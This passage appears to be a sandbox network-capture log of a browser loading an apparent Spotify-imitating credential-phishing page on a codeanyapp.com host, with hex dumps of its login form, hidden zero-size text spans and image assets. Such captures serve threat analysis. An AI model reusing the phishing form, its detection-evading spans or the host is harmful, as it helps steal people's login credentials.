                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:49:58 UTC185INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-01-02 08:49:58 UTC5609INData Raw: 31 35 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 72 65 73 2f 61 70 70 2e 63 73 73 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d
                                                                                                    Data Ascii: 15e1<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"> <title>Welcome</title> <link rel="stylesheet" href="res/app.css"></head>
                                                                                                    2025-01-02 08:49:58 UTC4358INData Raw: 31 30 66 65 0d 0a 3d 22 63 6f 6c 73 22 3e 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 22 3e 0d 0a 20 20 20 20 3c 6c 61 62 65 6c 3e 45 6d 61 69 6c 20 6f 72 20 75 73 65 72 6e 61 6d 65 3c 2f 6c 61 62 65 6c 3e 0d 0a 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 69 64 3d 22 75 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 20 6f 72 20 75 73 65 72 6e 61 6d 65 22 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 22 3e 0d 0a 20 20 20 20 3c 6c 61 62 65 6c 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0d 0a 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 69 64 3d 22 70 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 50 61 73 73 77 6f 72 64 22 3e 0d
                                                                                                    Data Ascii: 10fe="cols"><div class="col"> <label>Email or username</label> <input type="text" id="u" placeholder="Email or username"></div><div class="col"> <label>Password</label> <input type="password" id="p" placeholder="Password">
                                                                                                    2025-01-02 08:49:58 UTC2215INData Raw: 38 61 30 0d 0a 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 77 69 64 74 68 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 68 65 69 67 68 74 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 22 3e 36 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 77 69 64
                                                                                                    Data Ascii: 8a0 style="padding:0 !important; margin:0 !important; display:inline-block !important; width:0 !important; height:0 !important; font-size:0 !important;">6</span><span style="padding:0 !important; margin:0 !important; display:inline-block !important; wid
                                                                                                    2025-01-02 08:49:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.449748198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:49:59 UTC617OUTGET /army/army/auth/res/app.css HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: style
                                                                                                    Referer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.php
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:49:59 UTC258INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:21 GMT
                                                                                                    Content-Type: text/css
                                                                                                    Content-Length: 1957
                                                                                                    Connection: close
                                                                                                    Last-Modified: Tue, 31 Dec 2024 07:16:12 GMT
                                                                                                    ETag: "7a5-62a8bb434891b"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-01-02 08:49:59 UTC1957INData Raw: 2a 7b 0d 0a 20 20 20 20 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 0d 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 7d 0d 0a 20 0d 0a 0d 0a 62 6f 64 79 7b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 34 31 34 31 34 20 3b 0d 0a 20 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0d 0a 7d 0d 0a 0d 0a 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 0d 0a 7d 0d 0a 0d 0a 6d 61 69 6e 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d
                                                                                                    Data Ascii: *{ outline:none; box-sizing: border-box; font-family: sans-serif; max-width:100%;} body{ background: #141414 ; margin:0;}header { background:black; padding:10px;}main{ text-align:center;


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.449746198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:49:59 UTC664OUTGET /army/army/auth/res/logo.png HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.php
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:49:59 UTC236INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:21 GMT
                                                                                                    Content-Type: image/png
                                                                                                    Content-Length: 3282
                                                                                                    Connection: close
                                                                                                    Last-Modified: Tue, 31 Dec 2024 07:16:17 GMT
                                                                                                    ETag: "cd2-62a8bb482911c"
                                                                                                    Accept-Ranges: bytes
                                                                                                    2025-01-02 08:49:59 UTC1198INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9f 00 00 00 3f 08 06 00 00 00 fe 07 1a 0e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 0c 67 49 44 41 54 78 5e ed 9c 05 ac 54 47 17 c7 09 92 14 2d 10 1c 02 a5 b8 bb 15 b7 16 0d c5 8b 13 20 b8 06 8a 85 06 29 6e a5 b8 43 d1 00 41 8b 43 70 08 ee ee ee 2e 2d 21 c0 7c df 7f 76 ee 32 77 f6 dc bd 77 df db bd cb 7b 9d 7f f2 4b e0 dc 99 d9 d9 bd 73 67 ce 9c 33 f7 c5 f8 bf 98 46 13 26 48 a3 46 e3 06 a4 51 a3 71 03 d2 a8 d1 b8 01 69 d4 68 dc 80 34 6a 34 6e 40 1a 35 1a 37 20 8d 1a 8d 1b 90 c6 48 13 2f 5e 3c 56 b9 72 65 36 68 d0 20 b6 7d fb 76 f6 e6 cd 1b a6 ea d1 a3 47 6c f5 ea d5 ac 67 cf 9e ac 68 d1
                                                                                                    Data Ascii: PNGIHDR?sRGBgAMAapHYsttfxgIDATx^TG- )nCACp.-!|v2ww{Ksg3F&HFQqih4j4n@57 H/^<Vre6h }vGlgh
                                                                                                    2025-01-02 08:49:59 UTC2084INData Raw: c6 c6 62 c7 8e 1d 5e 1b 56 0e d8 da b6 6d cb ff 8f dd af 2c 6c 2a 8d b2 32 99 32 65 32 f5 41 a6 78 f1 e2 a6 b2 38 14 0c 3b 26 a2 0a 15 2a b0 2a 55 aa f8 d4 51 20 8d 9c 6d db b6 89 ae b9 af f3 e7 cf b3 ea d5 ab fb f4 29 5b b6 6c a2 84 59 75 eb d6 f5 29 2b 73 f8 f0 61 51 d2 a3 12 25 4a 90 e5 ac 50 97 fd a6 4d 9b f2 25 db 4a b7 6f df f6 eb 2f d6 aa 55 8b cf d8 fe 84 43 b9 f2 b2 8f 10 88 13 61 03 12 33 66 4c f1 3f 8f 6e dc b8 c1 db 18 37 6e 9c b0 38 d3 a8 51 a3 bc 9f af 02 77 47 56 83 06 0d 58 f9 f2 e5 59 ed da b5 d9 d0 a1 43 f9 49 76 ac 6c 54 5d 01 69 e4 44 34 fc 81 fc eb fd fb f7 79 1a 0c 37 1d b3 23 42 19 b8 21 af 5e bd 12 a5 9c 09 67 05 f3 e7 cf cf fb 13 37 6e 5c b6 7c f9 72 71 c5 ac 3e 7d fa f8 f4 5f 06 c7 f5 65 a1 6f 65 cb 96 25 cb 52 a8 83 8f f2 85 29
                                                                                                    Data Ascii: b^Vm,l*22e2Ax8;&**UQ m)[lYu)+saQ%JPM%Jo/UCa3fL?n7n8QwGVXYCIvlT]iD4y7#B!^g7n\|rq>}_eoe%R)


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.449750198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:49:59 UTC667OUTGET /army/army/auth/res/loading.gif HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.php
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:49:59 UTC239INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:21 GMT
                                                                                                    Content-Type: image/gif
                                                                                                    Content-Length: 79790
                                                                                                    Connection: close
                                                                                                    Last-Modified: Tue, 31 Dec 2024 07:16:17 GMT
                                                                                                    ETag: "137ae-62a8bb48319d3"
                                                                                                    Accept-Ranges: bytes
                                                                                                    2025-01-02 08:49:59 UTC2643INData Raw: 47 49 46 38 39 61 c8 00 c8 00 f7 00 00 1e d7 60 1f d7 61 20 d7 61 21 d8 62 24 d8 64 26 d8 66 27 d9 66 28 d9 67 29 d9 68 2a d9 68 2b d9 69 2d da 6b 2e da 6b 2f da 6c 30 da 6d 32 db 6e 37 db 72 3a dc 74 3b dc 74 3c dc 75 3d dd 76 41 dd 79 44 de 7b 45 de 7c 46 de 7c 47 de 7d 48 de 7e 4b df 80 4e e0 82 4f e0 83 50 e0 83 51 e0 84 53 e1 86 54 e1 86 55 e1 87 59 e1 89 5a e2 8b 5b e2 8b 5c e2 8c 5d e2 8c 65 e4 92 67 e4 93 67 e4 94 68 e4 94 69 e4 95 6b e5 96 6c e5 97 6e e5 99 6f e5 99 71 e6 9a 71 e6 9b 72 e6 9b 72 e6 9c 74 e6 9d 76 e7 9e 77 e7 9f 7b e8 a2 7c e8 a2 7d e8 a3 7e e8 a4 80 e8 a6 81 e9 a6 83 e9 a7 85 e9 a9 87 ea aa 89 ea ab 89 ea ac 8a ea ac 8b ea ad 8c eb ae 8f eb af 93 ec b2 94 ec b3 96 ec b5 97 ec b5 99 ed b7 9c ed b9 9e ee ba a0 ee bc a2 ee bd a4 ef
                                                                                                    Data Ascii: GIF89a`a a!b$d&f'f(g)h*h+i-k.k/l0m2n7r:t;t<u=vAyD{E|F|G}H~KNOPQSTUYZ[\]egghiklnoqqrrtvw{|}~
                                                                                                    2025-01-02 08:49:59 UTC2896INData Raw: de 7b 47 de 7d 49 df 7f 4a df 7f 4c df 81 4e df 82 4f e0 83 50 e0 83 51 e0 84 52 e0 85 53 e0 86 54 e1 86 55 e1 87 57 e1 88 58 e1 89 59 e1 8a 59 e2 8a 5a e2 8a 5a e2 8b 5b e2 8b 5c e2 8c 5d e2 8d 5e e2 8d 5f e3 8e 60 e3 8f 62 e3 90 63 e3 91 64 e3 92 64 e4 92 65 e4 92 66 e4 93 67 e4 94 68 e4 94 69 e4 95 6a e5 96 6b e5 96 6c e5 97 6d e5 97 6d e5 98 70 e5 9a 71 e6 9b 72 e6 9b 72 e6 9c 73 e6 9c 74 e6 9d 75 e6 9d 75 e6 9e 76 e7 9e 78 e7 9f 78 e7 a0 79 e7 a0 7a e7 a1 7b e7 a2 7b e8 a2 7c e8 a2 7c e8 a3 7d e8 a3 7e e8 a3 7e e8 a4 7f e8 a5 81 e9 a6 82 e9 a7 83 e9 a7 84 e9 a8 86 e9 aa 86 ea aa 87 ea ab 8b ea ad 8c eb ae 8f eb af 90 eb b0 91 eb b1 93 ec b3 94 ec b3 94 ec b4 95 ec b4 96 ec b5 97 ed b6 9a ed b8 9d ed b9 9d ee ba 9e ee ba 9f ee bb a0 ee bc a1 ee bd a2
                                                                                                    Data Ascii: {G}IJLNOPQRSTUWXYYZZ[\]^_`bcddefghijklmmpqrrstuuvxxyz{{||}~~
                                                                                                    2025-01-02 08:49:59 UTC4364INData Raw: f5 fd f7 f5 fd f8 f5 fd f8 f5 fd f8 f6 fd f8 f6 fd f9 f7 fd f9 f8 fd fa f8 fe fa f9 fe fa f9 fe fb fa fe fb fb fe fc fb fe fc fc fe fc fc fe fd fd fe fd fd fe fd fd fe fd fd fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                    Data Ascii:
                                                                                                    2025-01-02 08:49:59 UTC1448INData Raw: 86 87 a2 30 54 a6 0c d7 c4 91 6a f9 92 82 c6 8d e6 0e 1d 5d fe ed 6a 61 30 36 de 10 22 a2 b2 85 91 0e 4e 3a 9a 48 54 29 b7 29 da 40 14 cc 17 9f 2f dc 14 b8 11 72 01 c7 18 74 07 fc 21 17 42 46 f0 19 83 b6 50 ca e7 ae e7 04 05 35 57 1e d4 68 dd f0 10 c1 62 10 eb c2 40 bb 6b 9b 19 f8 71 64 80 70 02 6a c8 6b 1b 16 70 21 75 28 db 03 12 14 cb de cd 90 40 0a 5b fd d9 1c 9c 59 5f bf 18 a1 ae 4f 8b c3 12 66 d5 5f bd 98 60 09 91 a2 1b 21 b4 30 bf fa ca 40 0b eb 1a 5c 25 c6 70 ce dc 6e 40 08 3f a5 1c 1f b6 00 04 a4 c6 48 04 41 08 8d f1 ee 9a 57 14 9d c0 08 61 c8 2f f4 d2 ca 04 ae 1d c8 05 46 d0 02 54 ff 07 09 36 70 41 09 38 c8 4b 73 46 a0 83 27 84 61 8b 21 4c c3 16 a2 b0 84 23 10 01 08 62 71 c1 35 51 c0 82 18 d0 40 07 41 48 82 15 be 60 86 be 81 f1 ca 58 ce b2 96 b7
                                                                                                    Data Ascii: 0Tj]ja06"N:HT))@/rt!BFP5Whb@kqdpjkp!u(@[Y_Of_`!0@\%pn@?HAWa/FT6pA8KsF'a!L#bq5Q@AH`X
                                                                                                    2025-01-02 08:49:59 UTC8688INData Raw: 81 e4 11 c7 1a 61 54 d6 e1 18 72 8d 51 a1 14 65 e8 a1 c9 45 7f b0 b1 05 10 0d 76 91 55 18 03 22 51 06 75 1f fd 41 46 11 03 7e 71 15 18 f9 55 d1 06 24 26 29 82 c6 7d f0 85 41 55 2a 5e c0 07 83 17 8c b0 b4 c7 16 e3 95 27 86 54 a9 6c f1 9e 0d 64 44 02 d3 25 6d 24 f1 1e 1a 51 91 f1 5e 18 97 d4 44 87 6e e4 65 e8 14 1d e5 61 01 99 4d 9b a0 61 56 74 30 dc e1 14 20 30 6c 67 44 1f 3c 39 12 05 74 fe 38 c4 b8 94 23 3a 68 e7 42 1a a3 fc d4 c6 a8 b1 09 e1 5d 53 9a a0 19 1d 11 85 08 d5 88 13 b1 31 a1 68 53 a9 3c 17 dd 17 9b 10 95 0a 1b 14 8e 56 c5 95 4e ad 11 9d 0b 72 20 75 48 10 a2 75 91 ab 53 8b a4 7a dc 0d 64 22 05 89 a3 96 99 01 d5 28 4b 40 37 c4 af 4a 65 52 85 62 29 c4 11 55 1a d0 31 91 9e 53 59 f4 25 83 a9 50 21 42 a3 71 4c 18 f9 54 28 01 eb b5 c3 20 51 7d 82 98
                                                                                                    Data Ascii: aTrQeEvU"QuAF~qU$&)}AU*^'TldD%m$Q^DneaMaVt0 0lgD<9t8#:hB]S1hS<VNr uHuSzd"(K@7JeRb)U1SY%P!BqLT( Q}
                                                                                                    2025-01-02 08:49:59 UTC7696INData Raw: 4c 27 9c 15 ea 94 22 be 4c cd 0a 9e f7 53 89 20 22 6b b8 21 42 4e 8b ea 90 92 09 67 0b 4c 95 88 fd 98 93 ce a8 3e a4 7a ed b9 9d 55 1d f2 08 24 da 46 07 27 dd 6a 42 14 ca 1c 20 20 4e ac 06 b1 04 21 83 43 84 99 a1 15 21 fc 0c 4e 12 06 f6 56 84 90 14 37 c0 ab 2b 42 0c 31 49 e1 3c 01 92 7a 8d 85 d8 ac 73 84 b3 ea 75 67 cd 01 42 58 f5 fa 88 1a 5c 67 07 5a 0d ec 40 e4 b0 c9 c0 f5 4e b2 02 81 1d 78 92 f0 36 c9 6a 42 9e d6 79 01 bb 30 7b 08 47 82 c7 09 8b 94 2c 1d 08 58 ac ed e9 b5 0d ed b4 fe 8e 15 82 18 d8 cc b1 67 06 5f 48 6d 5d 07 cb 9e 14 54 21 90 5b bd a7 7d 3e b0 04 56 a2 d5 a9 ff 09 82 1a 32 21 56 4d 6c 09 41 2f 58 82 18 4e c9 d4 70 46 48 06 4c 20 83 f2 8a 4a bb 0d a1 e0 06 41 48 02 14 b4 20 86 34 bc 81 0f 7d 1c 08 24 04 61 87 f4 7e 93 0d ac dd 91 5f a4
                                                                                                    Data Ascii: L'"LS "k!BNgL>zU$F'jB N!C!NV7+B1I<zsugBX\gZ@Nx6jBy0{G,Xg_Hm]T![}>V2!VMlA/XNpFHL JAH 4}$a~_
                                                                                                    2025-01-02 08:49:59 UTC8232INData Raw: 21 92 ab c9 01 23 61 c4 9a 45 aa 11 37 6e 34 05 6e 92 80 c9 d5 9c cb 7d 91 c0 0d 15 50 82 a2 db 84 8e 84 8a 48 1d 4a b6 80 1b 21 4a f0 7f ad 31 03 4a 38 c8 9a bb d5 30 7b ad b1 d8 49 3e d7 1a b5 29 50 0e b8 71 58 49 76 c8 9a d7 91 90 0c b5 44 c9 17 6f 03 c9 1a 62 70 35 01 34 c9 22 86 53 2a 12 72 0d 25 98 18 8e 2d dd 77 08 dc dc a0 7f 27 51 56 6b b6 27 41 66 ae a6 70 29 41 e2 6d da a7 c0 07 b2 46 97 06 fe 1c 4e 19 b9 47 04 dc 68 d0 24 85 18 8e f0 dc 87 cb d6 bc f2 24 20 c4 4d 18 14 d8 a8 db c8 a0 37 2a 01 e2 67 76 30 af f2 51 f0 36 51 60 c9 c1 70 d3 c4 e8 bd f0 36 ec 54 c9 1e 86 83 4f ee 2d 91 35 e1 52 89 24 42 f8 99 1f 40 cf 77 95 28 a4 f3 2a aa 92 2e 34 30 7a 57 64 8d f2 5a 62 87 e1 3c 81 7b 94 f2 a7 4b 52 39 1c 40 f8 ee a3 b7 69 17 4b 18 86 9b 2c ae 6e
                                                                                                    Data Ascii: !#aE7n4n}PHJ!J1J80{I>)PqXIvDobp54"S*r%-w'QVk'Afp)AmFNGh$$ M7*gv0Q6Q`p6TO-5R$B@w(*.40zWdZb<{KR9@iK,n
                                                                                                    2025-01-02 08:49:59 UTC16384INData Raw: 1e 6c 13 cb cb d5 42 8f 9d b9 83 4b 2a c7 3a 53 4a 28 10 bf 31 21 4b 1c d7 19 1d 84 e1 9a d5 8b 94 75 60 62 31 ce 04 41 0d de 1c de 24 7e 23 bc 97 78 02 a3 8b 79 c2 1c 26 23 bf 30 fc 26 a6 2c 19 99 5f b8 10 bb fd 81 b0 36 5b 90 09 49 f5 d2 03 e7 1c 91 9e cf 9c c9 a1 90 30 1c 33 82 34 35 48 38 a7 4c e6 56 85 3d 9c ef 86 a5 e8 e2 31 69 72 09 45 e0 51 20 08 d3 1c 5a 1f 0b 93 48 84 d3 40 94 ad 09 28 60 f8 9b 2b 66 16 26 c6 5c e6 67 67 c2 08 e5 b4 6b b4 2e b1 44 27 4b 8a 5a 98 78 c2 61 b5 f1 fe 81 68 5a db 12 5a ac 92 36 6d a3 6d 4b da 49 9b 23 10 50 b7 26 e1 e8 6f a0 09 5c 95 84 96 a7 c5 4d 49 2d ca b0 1c 1e 80 2e b9 25 a9 c5 2c 95 e3 3b e8 92 84 13 b7 9d aa 75 49 c2 22 ea 10 41 a9 db fd 08 20 c0 aa 1c 43 84 37 24 a5 38 2e da ce 0b 92 48 98 aa 3a 4f f8 2d 7b
                                                                                                    Data Ascii: lBK*:SJ(1!Ku`b1A$~#xy&#0&,_6[I0345H8LV=1irEQ ZH@(`+f&\ggk.D'KZxahZZ6mmKI#P&o\MI-.%,;uI"A C7$8.H:O-{
                                                                                                    2025-01-02 08:49:59 UTC16384INData Raw: e0 87 57 e1 88 59 e1 8a 5b e1 8b 5d e2 8c 5e e2 8d 60 e2 8e 61 e2 8f 63 e3 91 65 e3 92 67 e3 93 69 e4 95 6b e4 97 6f e5 99 72 e5 9c 75 e6 9d 77 e6 9f 7a e7 a1 7b e7 a2 7d e7 a3 7e e7 a4 7f e8 a5 81 e8 a6 83 e8 a7 87 e9 aa 8a ea ac 90 eb b0 94 ec b3 99 ec b7 9e ed ba a4 ee be a7 ef c1 ab f0 c3 ad f0 c5 b0 f1 c7 b5 f1 ca b8 f2 cd bb f3 cf bd f3 d0 bf f3 d2 c2 f4 d4 c3 f4 d4 c3 f4 d5 c3 f4 d5 c4 f4 d5 c6 f5 d7 c7 f5 d8 c9 f5 d9 cb f5 da cc f5 db cf f6 dd d1 f6 de d4 f7 e0 d9 f8 e4 dc f8 e6 df f9 e8 e1 f9 ea e2 fa ea e4 fa ec e5 fa ed e7 fb ee e9 fb f0 ec fb f1 ed fb f2 ee fc f3 f0 fc f4 f2 fc f5 f3 fc f7 f5 fd f8 f5 fd f8 f6 fd f8 f6 fd f9 f6 fd f9 f7 fd f9 f8 fd fa f9 fd fb fb fe fc fc fe fc fc fe fd fc fe fd fd fe fd fd fe fd fd fe fd fe fe fe fe fe fe fe
                                                                                                    Data Ascii: WY[]^`acegikoruwz{}~
                                                                                                    2025-01-02 08:49:59 UTC7776INData Raw: 94 5a 6a ab 0c 68 3e ba c6 2e 02 5e bb 8b ac a4 c2 f0 d4 96 53 2b ac 25 e6 c0 df f0 42 5a 88 f9 1a 58 5f 5b fe 63 07 0e e8 a8 a6 f1 5d 54 75 15 a5 64 3c f3 49 45 6b 59 71 6f 45 d4 56 56 f3 dd 03 57 e2 8a e8 1f fd 23 30 c1 49 56 b3 88 01 20 73 74 c4 16 14 26 07 32 86 09 56 82 34 c8 dc 23 41 c9 42 85 84 23 c0 67 55 2d 72 60 98 1a 12 ac 00 75 87 87 23 24 72 d5 2d 1d 92 28 59 1c c4 f8 54 89 8a 23 08 d2 62 55 b7 d4 01 23 63 95 f4 54 cb 14 37 52 68 55 2e 23 c2 b8 45 72 3b 25 72 63 1c be 60 75 0b 1b 37 32 b2 d3 2c ed a9 28 c6 2c 5a c1 a2 05 8c 51 54 97 d3 20 30 32 81 0a 57 a3 20 01 23 65 37 b9 22 04 8c 9b 78 c5 a0 8a 48 80 77 d3 6f 2a 22 02 16 97 2a 0a 72 53 2b 30 ae d1 0b 58 b9 18 48 22 11 54 d6 44 88 8a 44 98 22 16 28 30 2a 52 93 2d 4f a8 b8 da 58 46 92 78 c5
                                                                                                    Data Ascii: Zjh>.^S+%BZX_[c]Tud<IEkYqoEVVW#0IV st&2V4#AB#gU-r`u#$r-(YT#bU#cT7RhU.#Er;%rc`u72,(,ZQT 02W #e7"xHwo*"*rS+0XH"TDD"(0*R-OXFx


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.449749198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:49:59 UTC668OUTGET /army/army/auth/res/remember.png HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
